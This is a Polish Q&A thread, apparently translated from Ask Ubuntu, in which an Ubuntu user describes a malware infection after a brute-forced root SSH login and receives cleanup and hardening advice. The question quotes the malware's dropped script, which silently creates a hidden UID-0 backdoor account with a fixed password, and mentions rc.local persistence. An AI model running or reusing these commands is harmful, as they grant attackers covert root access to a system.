Jak radzić sobie ze złośliwym oprogramowaniem na moim laptopie?

12

Jestem całkiem pewien, że mój laptop z Ubuntu 13.10 jest zainfekowany jakimś złośliwym oprogramowaniem.

Co jakiś czas znajduję proces / lib / sshd (należący do roota), który działa i zużywa dużo procesora. To nie jest serwer sshd, na którym działa / usr / sbin / sshd.

Plik binarny ma uprawnienia --wxrw-rwt i generuje i spawnuje skrypty w katalogu / lib. Ostatni nosi nazwę 13959730401387633604 i wykonuje następujące czynności

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Użytkownik gusr został utworzony przez złośliwe oprogramowanie niezależnie, a następnie chpasswd zawiesza się, zużywając 100% procesora.

Do tej pory stwierdziłem, że użytkownik gusr został dodatkowo dodany do plików w / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Wygląda na to, że złośliwe oprogramowanie wykonało kopie wszystkich tych plików z przyrostkiem „-”. Pełna lista plików / etc / zmodyfikowanych przez root jest dostępna tutaj .

Ponadto plik / etc / hosts został zmieniony na ten .

/ Lib / sshd zaczyna się od dodania się na końcu pliku /etc/init.d/rc.local!

Usunąłem użytkownika, usunąłem pliki, zabiłem drzewo przetwarzanych, zmieniłem moje hasła i usunąłem klucze publiczne ssh.

Wiem, że jestem w zasadzie przykręcony i najprawdopodobniej ponownie zainstaluję cały system. Niemniej jednak, ponieważ loguję się na kilka innych komputerów, dobrze byłoby przynajmniej spróbować go usunąć i dowiedzieć się, jak go dostałem. Będziemy wdzięczni za wszelkie sugestie, jak to zrobić.

Wygląda na to, że weszli 25 marca, brutalnie wymuszając logowanie roota. Nie miałem pojęcia, że ​​root ssh jest domyślnie włączony w Ubuntu. Wyłączyłem go i wystawiłem denyhosts.

Login pochodził z 59.188.247.236, najwyraźniej gdzieś w Hongkongu.

Mam laptopa z EmperorLinux i umożliwiły one dostęp do roota. Jeśli masz jedną z nich i korzystasz z sshd, uważaj.

security malware Dejan Jovanović
źródło
2
Odłącz urządzenie od sieci! Teraz!
Seth
2
I dlaczego masz włączone logowanie do roota? To jest coś, czego nie powinieneś włączać bez dobrego powodu.
Seth
@Seth Nie włączyłem go, domyślnie był włączony w Ubuntu. Jestem tak samo zaskoczony jak ty.
Dejan Jovanović
1
Zobacz „ Domyślnie demon SSH jest dostarczany z włączonymi zdalnymi loginami root. Zwykle Ubuntu nie zezwala na bezpośredni dostęp do użytkownika root, więc to ustawienie jest nieważne. Jeśli ustawiłeś hasło do konta root, to ustawienie może być potencjalne ryzyko bezpieczeństwa i powinno zostać wyłączone.
Seth
1
Jestem całkiem pewien, że tak nie jest Linux/Ebury. To coś innego i prawdopodobnie nie ma przypisanej nazwy. Ebury nie utworzyłby nowego konta użytkownika i zmodyfikowałby bibliotekę współdzieloną używaną przez openssh, nie wprowadzając nowego pliku binarnego o nazwie sshd.
Riking

Odpowiedzi:

11

Najpierw odłącz tę maszynę od sieci już teraz!

Po drugie, dlaczego masz włączone konto root? Naprawdę nie powinieneś włączać konta root, chyba że masz ku temu dobry powód.

Po trzecie, tak, jedynym sposobem na upewnienie się, że jesteś czysty, jest przeprowadzenie czystej instalacji. Zaleca się również, aby zacząć od nowa i nie wracać do kopii zapasowej, ponieważ nigdy nie można być pewnym, kiedy wszystko się zacznie.

Sugeruję również skonfigurowanie zapory ogniowej w następnej instalacji i odrzucanie wszystkich połączeń przychodzących: 

sudo ufw default deny incoming

a następnie pozwól ssh z: 

sudo ufw allow ssh

i NIE włączaj konta root! Na pewno upewnij się, że logowanie root ssh jest wyłączone.

Seth
źródło
4
Sprawdziłem konto roota. Dostałem laptopa od Emperorlinux, który umożliwił skonfigurowanie konta. Głupi.
Dejan Jovanović
1
@ DejanJovanović To okropne!
Seth